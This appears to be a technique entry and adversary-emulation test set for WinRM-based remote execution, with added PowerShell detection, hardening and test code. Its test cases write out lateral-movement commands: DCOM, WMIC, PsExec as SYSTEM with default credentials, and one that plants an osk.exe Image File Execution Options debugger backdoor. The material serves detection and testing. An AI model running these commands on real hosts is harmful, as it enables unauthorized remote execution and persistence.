Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the winrm command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014) The service listens on TCP 5985 (HTTP) and 5986 (HTTPS) by default, and commands received over it are executed on the target by the WinRM provider host, wsmprovhost.exe.

Detection: Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then its appearance may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM-invoked script to correlate them with other related events; on the target, a process creation event whose parent is wsmprovhost.exe is a direct indicator that the command arrived over WinRM.
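A detection check for the guidance above, added here as an example and not code from the original page: it flags process-creation records whose parent is wsmprovhost.exe, which is what a command executed through a remote PowerShell session looks like on the target. The records are constructed to mimic Sysmon Event ID 1 fields; the field names, sample values and the allow-list are assumptions to tune per environment.

```powershell
# Added example: flag processes spawned by the WinRM provider host.
# Input records are constructed to mimic Sysmon Event ID 1 (ProcessCreate) fields;
# in production feed it Get-WinEvent output mapped to the same property names.

function Find-WinRMSpawnedProcess {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        # Child images that are expected under wsmprovhost.exe at this site (assumption: tune locally).
        [string[]] $AllowList = @()
    )
    foreach ($e in $Events) {
        $parent = [System.IO.Path]::GetFileName($e.ParentImage)
        if ($parent -ne 'wsmprovhost.exe') { continue }
        $child = [System.IO.Path]::GetFileName($e.Image)
        if ($AllowList -contains $child) { continue }
        [pscustomobject]@{
            Time        = $e.UtcTime
            Host        = $e.Computer
            User        = $e.User
            Child       = $child
            CommandLine = $e.CommandLine
            Reason      = 'child of wsmprovhost.exe (command executed over WinRM)'
        }
    }
}

# Constructed sample telemetry (not real events). The first record is the provider
# host itself starting under svchost.exe; the second and third are commands run
# through the session; the last is ordinary interactive activity.
$SampleEvents = @(
    [pscustomobject]@{ UtcTime='2024-01-10 09:12:03'; Computer='WS01'; User='CORP\admin';
        Image='C:\Windows\System32\wsmprovhost.exe'; ParentImage='C:\Windows\System32\svchost.exe';
        CommandLine='C:\Windows\System32\wsmprovhost.exe -Embedding' }
    [pscustomobject]@{ UtcTime='2024-01-10 09:12:05'; Computer='WS01'; User='CORP\admin';
        Image='C:\Windows\System32\ipconfig.exe'; ParentImage='C:\Windows\System32\wsmprovhost.exe';
        CommandLine='ipconfig' }
    [pscustomobject]@{ UtcTime='2024-01-10 09:12:07'; Computer='WS01'; User='CORP\admin';
        Image='C:\Windows\System32\reg.exe'; ParentImage='C:\Windows\System32\wsmprovhost.exe';
        CommandLine='reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /t REG_SZ /d cmd.exe /f' }
    [pscustomobject]@{ UtcTime='2024-01-10 09:13:00'; Computer='WS01'; User='CORP\jsmith';
        Image='C:\Windows\System32\notepad.exe'; ParentImage='C:\Windows\explorer.exe';
        CommandLine='notepad.exe' }
)

Find-WinRMSpawnedProcess -Events $SampleEvents | Format-Table -AutoSize
```

Against the sample set the function returns the ipconfig and reg.exe records and ignores the other two. For live data, pull Sysmon Event ID 1 with Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1} and project Image, ParentImage, User and CommandLine out of each event's XML into the same property names; Security Event ID 4688 with "Creator Process Name" works the same way when Sysmon is not deployed.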
Platforms: Windows
Data Sources: File monitoring, Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Permissions Required: User, Administrator
System Requirements: WinRM listener turned on and configured on remote system
Remote Support: Yes
Powershell Enable WinRM
Supported Platforms: Windows
powershell Enable-PSRemoting -Force
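The same enabling step, carried further as an added example (not part of the original test): after Enable-PSRemoting it verifies the listener and firewall state and turns off the service settings that are most often left at insecure defaults, with a companion function for hosts where WinRM should not be running at all. It assumes an elevated session on Windows 8 / Server 2012 or later (for the NetSecurity module).

```powershell
# Added example: enable WinRM as the test does, then verify and harden it.
# Run elevated. Assumes Windows PowerShell 5.1 or PowerShell 7 on Windows.

function Get-WinRMStatus {
    # Snapshot of the state a defender wants to know for every host.
    $svc = Get-Service -Name WinRM
    $listeners = Get-ChildItem WSMan:\localhost\Listener | ForEach-Object {
        # Each listener's Keys look like @('Address=*', 'Transport=HTTP'); keep the transport.
        ($_.Keys | Where-Object { $_ -like 'Transport=*' }) -replace '^Transport=', ''
    }
    [pscustomobject]@{
        ServiceStatus    = $svc.Status
        StartType        = $svc.StartType
        Listeners        = ($listeners -join ',')
        AllowUnencrypted = (Get-Item WSMan:\localhost\Service\AllowUnencrypted).Value
        BasicAuth        = (Get-Item WSMan:\localhost\Service\Auth\Basic).Value
        TrustedHosts     = (Get-Item WSMan:\localhost\Client\TrustedHosts).Value
        FirewallRulesOn  = @(Get-NetFirewallRule -DisplayGroup 'Windows Remote Management' -ErrorAction SilentlyContinue |
                             Where-Object Enabled -eq 'True').Count
    }
}

function Enable-WinRMHardened {
    [CmdletBinding()]
    param(
        # Keep the HTTP (TCP 5985) listener; pass $false once an HTTPS listener is configured.
        [bool] $AllowHttpListener = $true
    )

    # Same step as the test: creates the listener, starts the service, adds firewall rules.
    Enable-PSRemoting -Force | Out-Null

    # Refuse unencrypted message bodies and Basic authentication; Kerberos/Negotiate stay on.
    Set-Item -Path WSMan:\localhost\Service\AllowUnencrypted -Value $false
    Set-Item -Path WSMan:\localhost\Service\Auth\Basic       -Value $false
    # An empty TrustedHosts list keeps this host from sending NTLM credentials to arbitrary names.
    Set-Item -Path WSMan:\localhost\Client\TrustedHosts -Value '' -Force

    if (-not $AllowHttpListener) {
        Get-ChildItem WSMan:\localhost\Listener |
            Where-Object { $_.Keys -contains 'Transport=HTTP' } |
            Remove-Item -Recurse -Force
    }
    Get-WinRMStatus
}

function Disable-WinRMCompletely {
    # For hosts where WinRM is not normally used. A listener reappearing on such
    # a host is exactly the change the detection guidance above keys on.
    Disable-PSRemoting -Force
    Stop-Service -Name WinRM
    Set-Service -Name WinRM -StartupType Disabled
    Get-NetFirewallRule -DisplayGroup 'Windows Remote Management' | Disable-NetFirewallRule
}

Enable-WinRMHardened | Format-List
```

Disable-PSRemoting only removes the session configurations' access; stopping and disabling the service and its firewall rules, as Disable-WinRMCompletely does, is what actually closes the port.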
Powershell lateral movement using the MMC20.Application COM object
Note: this test activates the MMC20.Application object on the remote host over DCOM rather than through a WinRM listener; it is listed with the other remote-execution tests for comparison.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
computer_name | Name of Computer | string | computer1 |
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
Utilize WMIC to start remote process
Note: WMIC reaches the target over DCOM/RPC, not WinRM. The command below writes an Image File Execution Options Debugger value for osk.exe, which persists on the target after the test; delete that registry key when the test is finished.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
user_name | Username | String | DOMAIN\Administrator |
password | Password | String | P@ssw0rd1 |
computer_name | Target Computer Name | String | Target |
wmic /user:${user_name} /password:${password} /node:${computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
Utilize psexec to start remote process
Note: PsExec reaches the target over SMB (the ADMIN$ share and the service control manager), not WinRM; the -s switch runs cmd.exe as SYSTEM.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
user_name | Username | String | DOMAIN\Administrator |
password | Password | String | P@ssw0rd1 |
computer_name | Target Computer Name | String | Target |
psexec \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe
Execute Invoke-command on remote host
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
host_name | Remote Windows Host Name | String | Test |
remote_command | Command to execute on remote Host | String | ipconfig |
invoke-command -computername #{host_name} -scriptblock {#{remote_command}}
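The Invoke-Command test carried out end to end, as an added example that is not part of the original test: it opens an explicit, credentialed PSSession, runs the command, and has the remote side report which process is hosting the session, so the execution and its telemetry footprint can be seen together. The host name and account are placeholders (assumptions); ipconfig matches the test's default remote_command.

```powershell
# Added example: credentialed Invoke-Command through an explicit PSSession,
# returning both the command output and the remote session's host process.

function Invoke-RemoteTest {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $ComputerName,
        [Parameter(Mandatory)] [pscredential] $Credential,
        [scriptblock] $RemoteCommand = { ipconfig }
    )
    $session = New-PSSession -ComputerName $ComputerName -Credential $Credential -ErrorAction Stop
    try {
        # The test command itself; output comes back as deserialized objects/strings.
        $output = Invoke-Command -Session $session -ScriptBlock $RemoteCommand

        # What the target sees: $PID inside the scriptblock is the remote session
        # host, and anything the command starts inherits it as parent process.
        $footprint = Invoke-Command -Session $session -ScriptBlock {
            $me = Get-CimInstance -ClassName Win32_Process -Filter "ProcessId = $PID"
            [pscustomobject]@{
                Host          = $env:COMPUTERNAME
                RunningAs     = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
                HostProcess   = $me.Name
                HostProcessId = $me.ProcessId
                ParentProcess = (Get-CimInstance -ClassName Win32_Process -Filter "ProcessId = $($me.ParentProcessId)").Name
            }
        }

        [pscustomobject]@{
            Output    = $output
            Footprint = $footprint
        }
    }
    finally {
        # Always tear the session down; a lingering session is itself an artifact.
        Remove-PSSession -Session $session
    }
}

# Usage with placeholder host and account (assumptions, not values from the test):
# $cred = Get-Credential 'DOMAIN\Administrator'
# $r = Invoke-RemoteTest -ComputerName 'Test' -Credential $cred -RemoteCommand { ipconfig }
# $r.Footprint
# $r.Output
```

On a WinRM session the Footprint object reports wsmprovhost.exe as HostProcess, which is the parent-process relationship the Detection section keys on; run the same function against a host where the detection is deployed to confirm the alert fires for the ipconfig child.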